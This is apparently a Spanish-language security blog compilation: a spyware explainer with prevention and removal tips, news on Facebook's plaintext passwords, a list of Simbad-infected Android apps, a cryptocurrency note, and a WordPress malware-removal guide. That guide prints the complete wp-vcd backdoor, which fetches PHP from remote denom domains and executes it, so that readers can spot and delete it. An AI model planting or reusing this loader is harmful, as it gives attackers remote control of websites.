  • Troyanos: después de aterrizar en un dispositivo, buscan información confidencial, como información de cuentas bancarias, y la envían a un tercero que la utilizará para robar dinero, comprometer cuentas o realizar compras fraudulentas. También se pueden usar para obtener el control de una computadora a través de la instalación de una puerta trasera o un troyano de acceso remoto (RAT).
  • Registradores de teclas: permiten que un malvado capture todas las pulsaciones del teclado, incluidas las pulsaciones que utiliza cuando inicia sesión en sus cuentas en línea.
  • Stalkerware: por lo general, se instala en un teléfono móvil para que un tercero pueda rastrear al propietario del teléfono. Por ejemplo, durante el juicio de Joaquín «El Chapo» Guzmán, se reveló que el capo de la droga instaló el software espía en los teléfonos de su esposa, asociadas y amigas para que pudiera leer sus mensajes de texto, escuchar sus conversaciones y seguir sus movimientos.
  • Stealware: está diseñado para aprovechar los sitios de compras en línea que otorgan créditos a sitios web que envían tráfico a sus páginas de productos. Cuando un usuario va a uno de esos sitios, el software de robo intercepta la solicitud y se acredita para enviar al usuario allí.
  • Monitores del sistema: registran todo lo que sucede en un dispositivo, desde pulsaciones de teclado, correos electrónicos y diálogos de salas de chat hasta sitios web visitados, programas iniciados y llamadas telefónicas, y lo envían a un intruso o ciberdelincuente. También pueden monitorear los procesos de un sistema e identificar cualquier vulnerabilidad en él.

¿Cómo funciona el spyware?

Spyware se distribuye de varias maneras. Uno de los más comunes es hacer que los usuarios hagan clic en un enlace que conduce a un sitio web malicioso. Esos enlaces pueden estar en correos electrónicos, mensajes de texto, ventanas emergentes en un navegador y anuncios en páginas web. También se sabe que los enlaces envenenados aparecen en los resultados de búsqueda de Google.

A veces no es necesario hacer clic en un enlace malicioso para acceder a un sitio web infectado. Esto se hace comúnmente a través de un anuncio infectado que se envía a sitios web legítimos a través de redes publicitarias legítimas, también conocidas como publicidad maliciosa . En ocasiones, los actores de amenazas insertan código malicioso en sitios web legítimos que pueden infectar a un visitante simplemente al ingresar a una página.

Abrir archivos infectados es otro método para distribuir spyware. Estos archivos se adjuntan normalmente a los mensajes de correo electrónico disfrazados como originados por una fuente confiable, como un banco o alguna organización nacional.

Los usuarios también pueden ser tentados a descargar spyware. Un desarrollador puede promocionar su programa como una adición útil a una biblioteca de software, pero puede contener software espía. En algunos casos, eliminar el software de su computadora eliminará la aplicación, pero el software espía se quedará atrás y continuará espiando a usted.

Los teléfonos móviles también pueden ser un objetivo de spyware. Aunque tanto Google como Apple hacen un trabajo decente al detectar aplicaciones maliciosas distribuidas a través de sus tiendas en línea, no son perfectas. Los usuarios deben tener especial cuidado con los programas distribuidos fuera de las tiendas de Google y Apple. 

A veces, las aplicaciones maliciosas pueden parecer programas originales, o pueden enmascararse como un programa existente.

Ingeniería Social sigue siendo el número uno de manera de difundir las infecciones de malware. «Engañar a alguien para que vaya a una página web que explota la vulnerabilidad de un navegador o explota la credibilidad del usuario será la principal forma en que se distribuya cualquier malware, incluido el software espía».

Cómo prevenir el spyware

Muchas infecciones de spyware pueden ser evitadas por los usuarios. «Las infecciones de spyware se producen porque las personas visitan sitios web infames sin conocimiento». «Hacer clic en un enlace aleatorio. Abrir un archivo adjunto que no deberían.

También se debe tener cuidado al descargar archivos. Los archivos solo deben descargarse de sitios de confianza. Si tiene un buen programa antivirus o antimalware, en muchos casos, marcará las descargas infectadas. Asegúrese de que su software de seguridad provenga de un proveedor confiable. Se sabe que los autores de malware entierran sus productos en aplicaciones antivirus falsas.

Para teléfonos móviles, es mejor descargar aplicaciones de Google Play para teléfonos Android y App Store para móviles con iOS. También debe evitarse «Rootear» un dispositivo Android o «desbloquear» un iPhone si está preocupado por el software espía. En un entorno empresarial, es aconsejable convertir esto en una política. El uso de software de administración de dispositivos móviles (MDM) que limita la descarga a aplicaciones aprobadas también es una buena opción.

Además, aunque es poco probable que alguien acceda físicamente a su teléfono para instalar software espía en él, siempre cree un código de bloqueo para su teléfono que solo usted sepa. Este es un requisito en muchos entornos corporativos.

Incluso si tiene cuidado con los enlaces en los que hace clic, los archivos adjuntos que abre y los archivos que descarga, es posible que las infecciones drive-by lo afecten. Dado que los ataques drive-by a menudo dependen de las vulnerabilidades del navegador para infectar a sus víctimas, el riesgo de infecciones drive-by puede reducirse manteniendo la versión de su navegador actualizada.

Dado que el spyware está frecuentemente conectado a ventanas emergentes y publicidad, hay varios pasos que puede tomar para abordar esos conductos de malware. Tanto Mozilla Firefox como Google Chrome tienen bloqueadores de ventanas emergentes integrados. Se pueden configurar para bloquear todas las ventanas emergentes o avisarle cuando un sitio web desea iniciar una ventana emergente para que pueda decidir si desea verlo. También puede permitir ventanas emergentes automáticamente desde sitios de confianza.

Las amenazas de publicidad maliciosa pueden solucionarse instalando un bloqueador de anuncios en su navegador, si aún no tiene esa característica. AdBlock Plus es uno de los programas más populares para bloquear anuncios. El software anti-rastreo, como Ghostery, también puede ser un complemento valioso para el navegador para reducir el riesgo de infecciones de spyware.

En un entorno corporativo, una buena solución de protección de punto final detectará la mayoría de los programas publicitarios. Sin embargo, lo que probablemente sea más efectivo es un fuerte programa de concienciación sobre seguridad que enseña a los empleados cómo evitar el adware y otros tipos de infecciones de malware.

Cómo eliminar spyware

Si su computadora parece inusualmente lenta o se bloquea mucho, su navegador se encuentra sobrepoblado con ventanas emergentes, o si comienza a observar una actividad sospechosa en el disco duro, sus esfuerzos para evitar el software espía podrían haber fallado. Eso significa que tendrás que eliminar la infección.

Eliminar cualquier tipo de malware manualmente es difícil, pero puede ser aún más con el software espía. El malware está diseñado para ser clandestino. Eso significa que ocultará signos reveladores de su presencia, como iconos. La verificación de los recursos del sistema también puede ser un callejón sin salida. Los autores de spyware a menudo nombran sus archivos para imitar los nombres de los archivos reales del sistema para ocultar su identidad.

Varios programas, algunos de ellos gratuitos, pueden detectar y eliminar el software espía. Incluyen SUPERAntiSpyware, Malwarebytes, Avast Free Antivirus, AVG AntiVirus, Adaware, Trend Micro HouseCall, SpywareBlaster y SpyBot Search & Destroy. Además, Actiance Security Labs mantiene Spyware Guide , que enumera miles de programas de spyware con enlaces a herramientas para eliminarlos de los sistemas.

El spyware en los teléfonos inteligentes puede causar síntomas similares a los de las computadoras, como los bloqueos frecuentes del sistema y los impactos en el rendimiento, pero también hay otros signos. Por ejemplo, el teléfono puede comenzar a apagarse solo y no responder de inmediato cuando intenta volver a encenderlo. Otros signos incluyen un agotamiento más rápido de la batería de lo normal, aumentos en el uso de datos y mensajes de texto inusuales en su bandeja de entrada.

Otra sugerencia es la modificación de su teléfono que le permite descargar aplicaciones fuera de las tiendas de aplicaciones de Google y Apple. En Android, esto suele hacerse cambiando la configuración de seguridad de un teléfono para permitir descargas de fuentes desconocidas. En iOS, a veces se hace colocando en un teléfono una aplicación llamada Cydia, que se utiliza para descargar software en un iPhone con jailbreak.

Si sospecha que tiene spyware en su teléfono, puede hacer una copia de seguridad de sus datos y restablecerla a su configuración de fábrica. También querrá asegurarse de que está ejecutando la última versión de su sistema operativo.

Al igual que con las computadoras, también hay programas de seguridad que pueden usarse para escanear un teléfono en busca de spyware y eliminarlo, aunque esa solución puede no ser efectiva en todos los casos. Para los teléfonos Android, también hay una «opción nuclear» llamada dr.phone. Eliminará total y permanentemente todo lo que tenga en su teléfono: fotos, aplicaciones, contactos, mensajes, registros de llamadas y todos los datos privados. No debe ser usado a la ligera.

Millones de Contraseñas de Facebook se almacenaban en Texto Plano

Categoría: Facebook Seguridad

Facebook reconoció que las contraseñas de cientos de millones de usuarios se habían almacenado en servidores internos sin encriptar, pero dijo que no habían ocurrido fallos de seguridad. Ya que supuestamente no hubo fuga de información por parte de sus empleados, ni infiltraciones en su red de base de datos.

«Hemos resuelto el problema y, como medida de precaución, hemos prevenido a todos aquellos cuyas contraseñas se almacenaron de esta forma», dijo Facebook en un comunicado, en el que explicó que normalmente sus sistemas deberían haberlas encriptado.

El gigante de las redes sociales tiene la intención de advertir de los hechos a «cientos de millones de usuarios de Facebook Lite», una versión menos pesada del sitio para regiones del mundo con una conexión a internet de menor calidad, «a decenas de millones de otros usuarios de Facebook y decenas de miles de usuarios de Instagram», detalló en el comunicado.

«Estas contraseñas nunca fueron visibles para nadie fuera de Facebook y, hasta la fecha, no hemos encontrado evidencia de que alguien haya abusado internamente o accedido indebidamente a ellas», reiteró la red social, cuya imagen está ya bastante empañada por su gestión de los datos personales de sus usuarios, especialmente desde el estallido del escándalo de Cambridge Analytica en 2018.

Según el sitio especializado en ciberseguridad KrebsOnSecurity, unos20.000 empleados de Facebook han tenido acceso, en algunos casos durante años, a cientos de millones de contraseñas almacenadas en forma de texto normal.

Meses atrás, Facebook había reconocido que los hackers podían tener acceso a las cuentas de decenas de millones de usuarios a causa de un bug, un defecto informático.

Sin embargo desde Facebook anunciaron que por seguridad personal se debería cambiar la contraseña usada si se ha logueado alguna vez mediante Facebook Lite y no la ha modificado por muchos años.

Fuente: https://www.cnet.com/news/facebook-found-millions-of-passwords-stored-in-plain-text-in-internal-investigation/

Eliminar Malware en WordPress

Categoría: Seguridad Wordpress

Si encuentras en el código fuente de los sitios wordpress, algo parecido al código debajo es porque tienes el sitio wordpress infectado. 

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password']

Comúnmente pasa por bajar plugins o themes premium desde lugares en donde se ofrecen de forma gratuita. Pero es muy simple eliminar esta clase de virus. Para ello vamos a realizar lo siguiente.

  1. En el directorio wp-includes, borramos los archivos wp-vcd.php y wp-tmp.php
  2. En el directorio wp-includes, abrimos el archivo post.php y borramos el contenido dentro del primer tag php agregado por el malware. (if (file_exists(dirname(FILE) . ‘/wp-vcd.php’)) include_once(dirname(FILE) . ‘/wp-vcd.php’);)
  3. Abrimos el archivo del theme functions.php, y borramos el siguiente código.
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '429acb1c29e4800452a3538a8f91edd0'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
if( fwrite($handle, "<?php\n" . $phpCode))
{
}
else
{
$tmpfname = tempnam('./', "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php\n" . $phpCode);
}
fclose($handle);
include $tmpfname;
unlink($tmpfname);
return get_defined_vars();
}
$wp_auth_key='70daf53a6c8b84ec5c45e84e576ae4d2';
if (($tmpcontent = @file_get_contents("http://www.denom.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.denom.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
}
elseif ($tmpcontent = @file_get_contents("http://www.denom.pw/code.php") AND stripos($tmpcontent, $wp_auth_key) !== false ) {
if (stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
@file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
@file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
@file_put_contents('wp-tmp.php', $tmpcontent);
}
}
}
} elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
} elseif (($tmpcontent = @file_get_contents("http://www.denom.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.denom.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
extract(theme_temp_setup($tmpcontent));
}
}
}
//wp_tmp
//$end_wp_theme_tmp

Con esto debería ser suficiente, pero si tenemos mas themes o plugins que hemos bajado necesitamos verificar antes de instalar directamente desde el zip original.

Simbad, el virus en mas de 200 ‘apps’ de Google Play

Categoría: Android

El Instituto Nacional de Ciberseguridad (Incibe) ha informado de que ha detectado más de 200 aplicaciones infectadas por un código malicioso apodado Simbad, que estuvieron disponibles en la tienda oficial Google Play. Este viernes se han hecho eco los Mossos desde Twitter.

Según precisa el centro tecnológico, la funcionalidad principal del ‘malware’ es mostrar publicidad y, aunque las aplicaciones ya han sido eliminadas de Google Play, los usuarios que instalaron alguna de ellas deberán borrarlas manualmente.

Se han visto afectados aquellos usuarios que tengan instaladas en su dispositivo, alguna de las aplicaciones de la siguiente tabla.

Desde Google ya se han tomado las acciones necesarias para eliminar las aplicaciones afectadas de Google Play, por lo que no existe riesgo de que se vean infectados nuevos usuarios.

Como una de las funcionalidades del código malicioso es la de eliminar el icono de las aplicaciones del lanzador, para que sea más difícil de eliminar, se aconseja acceder a Ajustes -Aplicaciones y revisar el listado completo de aplicaciones instaladas en el dispositivo para descartar que no se tenga instalada ninguna ‘app’ de las afectadas. 

Listado de Apps Infectadas

Nombre del PaqueteApp Name# Installs
com.heavy.excavator.simulator.driveandtransportSnow Heavy Excavator Simulator10,000,000
com.hoverboard.racing.speed.simulatorHoverboard Racing5,000,000
com.zg.real.tractor.farming.simulator.gameReal Tractor Farming Simulator5,000,000
com.ambulancerescue.driving.simulatorAmbulance Rescue Driving5,000,000
com.heavymountain.bus2018simulatorHeavy Mountain Bus Simulator 20185,000,000
com.firetruckemergency.driverFire Truck Emergency Driver5,000,000
com.farming.tractor.realharvest.simulatorFarming Tractor Real Harvest Simulator5,000,000
com.carparking.challenge.parksimulatorCar Parking Challenge5,000,000
com.speedboat.jetski.racing.simulatorSpeed Boat Jet Ski Racing5,000,000
com.watersurfing.carstunt.racing.simulatorWater Surfing Car Stunt5,000,000
com.offroad.woodtransport.truckdriverOffroad Wood Transport Truck Driver 20185,000,000
com.volumen.booster.equalizerVolumen booster & Equalizer5,000,000
com.ks.prado.Car.parking.race.drive.appsPrado Parking Adventure5,000,000
com.zg.offroad.Oil.tanker.transporter.truck.cargo.simulatorOil Tanker Transport Truck Driver5,000,000
com.monstertruck.demolitionMonster Truck Demolition1,000,000
com.hummerlimotaxi.simulator.drivingHummer taxi limo simulator1,000,000
com.excavator.wreckingball.demolition.simulatorExcavator Wrecking Ball Demolition Simulator1,000,000
com.offroad.gold.transport.truckOffroad Gold Transport Truck Driver 20181,000,000
com.sea.animals.trucktransport.simulatorSea Animals Truck Transport Simulator1,000,000
com.water.surfingrace.motorbike.stuntWater Surfing Motorbike Stunt1,000,000
com.policechase.thiefpersecutionPolice Chase1,000,000
com.police.plane.transporter.gamePolice Plane Transporter1,000,000
com.ambulance.driver.extreme.rescue.simulatorAmbulance Driver Extreme Rescue1,000,000
com.hovercraftracer.speedracing.boatHovercraft Racer1,000,000
com.cars.transport.truckdriver.simulatorCars Transport Truck Driver 20181,000,000
com.motorbike.pizza.delivery.drivesimulatorMotorbike Pizza Delivery1,000,000
com.heavy.excavator.stonecutter.simulatorHeavy Excavator – Stone Cutter Simulator1,000,000
com.bottle.shoot.archery.gameBottle shoot archery1,000,000
com.offroadbuggy.car.racingsimulatorOffroad buggy car racing1,000,000
com.garbagetruck.city.trash.cleaningsimulatorGarbage Truck – City trash cleaning simulator1,000,000
com.tanks.attack.simulator.war.attackTanks Attack1,000,000
com.dinosaurpark.trainrescueDinosaur Park – Train Rescue1,000,000
com.pirateshipboat.racing3d.simulatorPirate Ship Boat Racing 3D1,000,000
com.flyingtaxi.simulator.raceFlying taxi simulator1,000,000
com.jetpackinwater.racersimualtor.dangerJetpack Water1,000,000
com.boostervolumen.amplifiersoundandvolumenVolumen Booster1,000,000
com.farmgames.animal.farming.simulatorAnimal Farming Simulator1,000,000
com.monstertruck.racing.competition.simulatorMonster Truck1,000,000
com.simulator.offroadjeep.car.racingOffroad jeep car racing1,000,000
com.simulator.flyingcar.stunt.extremetracks.racingFlying Car Stunts On Extreme Tracks1,000,000
com.simulator.tractorfarming.drivingTractor Farming 20181,000,000
com.impossible.farming.transport.simulatorImpossible Farming Transport Simulator1,000,000
com.volumenbooster.equalizerboostVolumen Booster1,000,000
com.mustang.rally.championship.racingsimulatorMustang Rally Championship1,000,000
com.deleted.photo.recoveryDeleted Photo Recovery1,000,000
com.race.boat.speedySpeed Boat Racing1,000,000
com.cycle.bike.racing.gameSuper Cycle Jungle Rider1,000,000
com.write.name.live.wallpaper.hdMy name on Live Wallpaper1,000,000
com.maginal.unicorn.gameMagical Unicorn Dash1,000,000
com.grafton.cycle.jungle.rider.raceSuper Cycle Jungle Rider1,000,000
com.lovecallingapps.lovecaller.ScreenLove Caller Screen1,000,000
com.city.car.funny.racing.stunt.game.proRacing Car Stunts On Impossible Tracks1,000,000
com.citycar.funny.racinggame.stunt.simulatorRacing Car Stunts On Impossible Tracks 21,000,000
com.urban.Limo.taxi.simulation.gamesUrban Limo Taxi Simulator1,000,000
com.cg.heavy.tractor.simulator.gameTractor Farming Simulator1,000,000
com.campervan.drivingsimulator.caravanCamper Van Driving1,000,000
com.bootleshoot.sniperBottle Shoot Sniper 3D1,000,000
com.globalcoporation.fullscreenincomingcaller.appFull Screen Incoming Call1,000,000
com.mustache.beard.editorBeard mustache hairstyle changer Editor1,000,000
com.volumenbooster.increaservolumenVolumen Booster1,000,000
com.photoeditor.girlfriend.addgirlstophoto.picgirlfriend photo editor1,000,000
com.tracker.location.number.free.spyMobile Number Tracker & Locator1,000,000
com.garden.editor.appGarden Photo Editor1,000,000
com.fortunewheel.gameFortune Wheel1,000,000
com.farming.transport.tractor.simulatorFarming Transport Simulator 20181,000,000
com.offroad.tractor.transport.drivingsimulatorOffRoad Tractor Transport1,000,000
com.customwallpaper.mynameonlivewallpapermy name on live wallpaper1,000,000
com.flying.ambulance.emergency.rescue.simulatorFlying Ambulance Emergency Rescue500,000
com.mustang.driving.car.raceMustang Driving Car Race500,000
com.waterpark.carracing.simulatorWaterpark Car Racing500,000
com.impossibletrucks.extremetrucks.simulatorImpossible Tracks – Extreme Trucks500,000
com.extreme.flying.motorbike.stuntsimulatorFlying Motorbike Stunts500,000
com.emergency.firetruck.rescue.drivingsimulatorFire Truck Emergency Rescue – Driving Simulator500,000
com.snowplow.simulator.heavysnow.excavatorHeavy Snow Excavator Snowplow Simulator500,000
com.waterskiing.simulator.gamesWater Skiing500,000
com.photomaker.editor.women.makeupandhairstyleWomen Make Up and Hairstyle Photo Maker500,000
com.fortune.mountainMountain Bus Simulator500,000
com.vanpizza.truckdelivery.simulatorVan Pizza500,000
com.truck.simulator.transportandparkingTruck Transport and Parking Simulator500,000
com.hoverboard.racing.spider.attacksimulatorHoverboard Racing Spider Attack500,000
com.moto.sport.championship.racingsimulatorMotorsport Race Championship500,000
com.demolitionderby.simulatorDemolition Derby500,000
com.lovecaller.free.loveringtonesLove Caller with love ringtones500,000
com.house.transport.truck.movingvan.simulatorHouse Transport Truck – Moving Van Simulator500,000
com.heavy.excavator.simulator.stonedrillerHeavy Excavator Stone Driller Simulator500,000
com.cycle.downhill.gameSuper Cycle Downhill Rider500,000
com.extreme.rallychampionship.raceExtreme Rally Championship500,000
com.missileattack.army.truckMissile Attack Army Truck500,000
com.mobile.caller.location.tracker.freecallCaller Location & Mobile Location Tracker500,000
com.mobilenumberlocator.trackerMobile number locator500,000
com.mynameonlivewallpaper.animated.hdMy name on Live Wallpaper500,000
com.spk.coach.offroad.School.bus.mountain.freeCity Metro Bus Pk Driver Simulator 2017500,000
com.fullscreen.incomingcaller.appFull Screen Incoming Call500,000
com.allsuit.man.casualshirt.photo.editorMan Casual Shirt Photo Suit500,000
com.americanmuscle.car.raceAmerican muscle car race500,000
com.offroad.nuclearwastetransport.truckdriverOffroad Nuclear Waste Transport – Truck Driver500,000
com.madcars.fury.racing.driving.simulatorMad Cars Fury Racing100,000
com.high.wheeler.speed.race.championshipHigh Wheeler Speed Race100,000
com.colorbynumber.number.coloring.paint.gameNumber Coloring100,000
com.campervan.race.driving.simulator.gameCamper Van Race Driving Simulator 2018100,000
com.unicornfloat.speedrace.simulatorUnicorn Float – Speed Race100,000
com.dualscreenbrowserDual Screen Browser100,000
com.harvest.timber.simulatorandtransportHarvest Timber Simulator100,000
com.racingsimulator.hot.micro.racersHot Micro Racers100,000
com.lara.unicorn.dash.magical.raider.raceLara Unicorn Dash100,000
com.wingsuit.simulator.extremeWingsuit Simulator100,000
com.foodtruck.driving.simulatorFood Truck Driving Simulator100,000
com.dograce.competitionDog Race Simulator100,000
com.suvcar.parking.simulator.gameSUV car – parking simulator100,000
com.clap.phonefinder.locatorPhone Finder100,000
com.phonenumerlocator.findphonenumbersPhone number locator100,000
com.whatsapplock.gallerylock.ninexsoftech.lockGallery Lock100,000
com.secret.screenrecorder.screenshotrecordSecret screen recorder100,000
com.facebeauty.makeupFace Beauty Makeup100,000
com.write.your.christmas.letter.santa.threewisemenChristmas letters to santa and three wise man100,000
com.deletedfiles.photo.audio.video.recoveryDeleted Files recovery100,000
com.screndualbrowserdouble.app.androidDual Screen Browser100,000
com.crack.mobile.screen.prankBroken Screen – Cracked Screen100,000
photoeditor.Garden.photoframeGarden Photo Editor100,000
com.modiphotoframe.editorModi Photo Frame 2100,000
com.callerscreen.lovecallerLove Caller Screen100,000
com.antitheftalarm.fullbatteryalarm.soundAnti Theft & Full Battery Alarm100,000
com.lovecaller.screen.customLove Caller Screen 2100,000
com.sms.message.voice.readingVoice reading for SMS. Whatsapp & text sms100,000
com.photo.text.editor.nameonpicName on Pic-Name art100,000
com.mtsfreegames.SpeedboatracingSpeed Boat Racing100,000
com.simulator.traindrivingTrain Driving Simulator100,000
com.grafton.Cycle.jungle.riderSuper Cycle Rider100,000
com.gl.racinghorse.competitionRacing Horse Championship 3D100,000
moveapptosd.tosdcard.freeappMove App To SD Card 2016100,000
com.avatarmaker.poptoy.creatorPop Toy Creator100,000
com.myphoto.live.wallpaper.editorPhoto Live Wallpaper50,000
com.messenger2.play.game.UnicorndashkMagical Unicorn Dash50,000
com.truck.wheelofdeathTruck Wheel of Death50,000
com.livetranslator.translateinliveLive Translator50,000
com.volumecontrol.widget.volumeboosterVolume Control Widget50,000
com.worldcup2018football.shirt.maker.photoeditorWorld cup 2018 football shirt maker50,000
com.girlfriendphotoeditor.girlsinyourphotoGirlfriend Photo Editor 250,000
com.myphoto.on.musicplayer.freeMy Photo on Music Player50,000
com.taxidriving.simulatorgame.racetaxi50,000
com.garden.photoeditor.photoframeGarden Photo Editor50,000
com.fortunewheel.deluxeFortune Wheel Deluxe50,000
com.motorcycle.extremeracing.simulatorExtreme Motorcycle Racer50,000
com.offroad.snow.bike.christmas.racingOffroad Snow Bike – Christmas Racing50,000
com.Droidhermes.bottleninjaBottle Shoot50,000
com.Hadiikhiya.photochangebackgroundPhoto Background Changer 201750,000
com.offroad.christmas.treetransport.truck.driversimulatorOffroad Christmas Tree Transport50,000
com.tank.transport.armytruck.simulatorTank Transport Army Truck50,000
com.flagteams.facepaint.editor.world2018cupFlag face paint: World Cup 201810,000
com.russianworld2018cup.livewallpaper.flagsteamWorld Cup 2018 Teams Flags Live Wallpaper10,000
com.editor.selfie.camera.photoSelfie Camera10,000
com.desirepk.Offroad.transport.simulator.appsMissile Attack Army Truck10,000
massimo.Vidlan.maxplayerMax Player10,000
com.flashalerts.callandsmsFlash Alert – Flash on Call10,000
com.photovideo.maker.withmusicPhoto Video Maker with Music10,000
com.braingames.iqtest.skillsBrain Games & IQ Test10,000
com.mix.audio.and.videoAudio Video Mixer10,000
com.poptoy.creator.edityourpoptoyPop Toy Creator 210,000
com.flashalert.callandsmsFlash on Call and SMS10,000
com.photoframe.of.heartHeart Photo Frames10,000
com.shayari.hindi.status.photo.textShayari 201710,000
com.happy.photo.birthday.cakePhoto on Birthday Cake10,000
com.photoeditor.nature.photoframesNature Photo Frames10,000
com.photoframe.calendar2018editorCalendar 2018 Photo Frame10,000
com.christmas.truck.transportsimulator.gameChristmas Truck Transport Simulator10,000
com.christmas.vandrive.modern.santaModern Santa – Christmas van drive10,000
com.anbrothers.voicechanger.appChange your voice10,000
com.monsters.vs.water.duelMoster vs Water10,000
com.flowers.editor.photo.frameEDIT Flowers Photo Frames10,000
videoeditor.musicvideo.Phototovideomaker.videoeditorPhoto Video Maker with Music10,000
com.racing.games.toiletpaper.raceToilet Paper Race10,000
com.Zv.puppiesdog.racegameDog Crazy Race Simulator10,000
com.luxury.photo.frame.photo.editorLuxury Photo Frame10,000
com.bike.wheelofdeathBike Wheel of Death10,000
com.qbesoft.worldfamousphotoframes.appWorld Famous Photo Frames10,000
com.heavysnowexcavator.christmas.rescueHeavy Snow Excavator Christmas Rescue10,000
com.syor.deleted.photo.recovery.video.restoreDeleted Files Recovery10,000
com.footballanalyzer.resultsandstatsFootball Results & Stats Analyzer5,000
com.photoframe.cube3d.live.wallpaper.hd3D Photo Frame Cube Live Wallpaper5,000
com.photoframe.geenhillGreen Hill PhotoFrame5,000
com.christmas.magnetic.magicboard.drawandwriteChristmas Magic Board5,000
com.animalspart.photo.editorAnimal Parts Photo Editor5,000
com.camera.blur.photoeffectsDSLR Camera Blur5,000
com.quick.photo.frame.carphotoframeCar Photo Frame5,000
com.game.handsslap.manitascalientes.redhandsHands Slap Game5,000
com.maa.durga.live.wallpaper4D Maa Durga Live Wallpaper5,000
com.photomontage.men.sweatshirt.editorMen Sweatshirt Photo Editor1,000
com.wordsgame.connectlettersConnect Letters. Words Game1,000
lanas.recover.deleted.pictures.photosRecover Deleted Pictures1,000
com.customized.radio.alarm.clockCustom Radio Alarm Clock1,000
com.antispamcalls.blockspamcallerAnti-spam Calls1,000
com.compatibilitytest.friends.couplesCompatibility Test1,000
com.dualscreen.android.app.doubleDual Screen Browser1,000
com.magic.glow.livewallpaper.animatedwallpaperMagic Glow Live Wallpaper1,000
com.game.virtualpet.porgyPorgy Virtual Pet1,000
com.explosiongame.taptheballTap the Ball1,000
com.analog.digital.clock.live.wallpaperClock Live Wallpaper1,000
com.royalestas.informationRoyale Stats1,000
com.editor.firetext.photo.frameFire text photo frame1,000
editor.card.greetings.christmas.com.christmasgreetingscardChristmas greetings card1,000
com.bestappsco.bestapplock.freeBest App Lock1,000
com.DJ.photoframe.editorDJ Photo Frames1,000
com.autocall.redial.automatic.recallAuto Call redial500
com.picquiz.guess.picture.gameGuess the picture500
com.professionalrecorder.audio.call.recordProfesionalRecorder500

Para un análisis del código fuente de las distintas aplicaciones le recomiendo seguir el link de la fuente, listado abajo.

Fuente: https://research.checkpoint.com/simbad-a-rogue-adware-campaign-on-google-play/

Son seguras las CriptoMonedas?

Categoría: Blog Criptomonedas

Ultimamente se esta hablando muchisimo en los blogs de las diferentes criptomonedas, pero son seguras las criptomonedas?

Las criptomonedas están basadas en la ya conocida tecnología blockchain. La cual se está usando para muchísimos desarrollos de sistemas. Cuentan con un sinfín de beneficios y los expertos aseguran que en unos 5 años todos los desarrollos de sistemas van a estar basados en la tecnología blockchain.

Pero la cuestión en este dilema es si verdaderamente las criptomonedas son seguras. Aquí hay que hacer una aclaración y es que nada es 100% seguro, ya que la computación cambia a una velocidad considerable cada año y se van descubriendo cosas increíbles.

Al invertir en criptomonedas tenemos que asesorarnos bien con gente especializada y verificar la reputación de los sitios en los cuales vamos a invertir nuestro dinero. Los servidores en los cuales se encuentran alojadas nuestras billeteras virtuales deben estar actualizados 100% y si recurrimos a tener billeteras físicas para criptomonedas nuestra clave tiene que estar segura y bien resguardada.

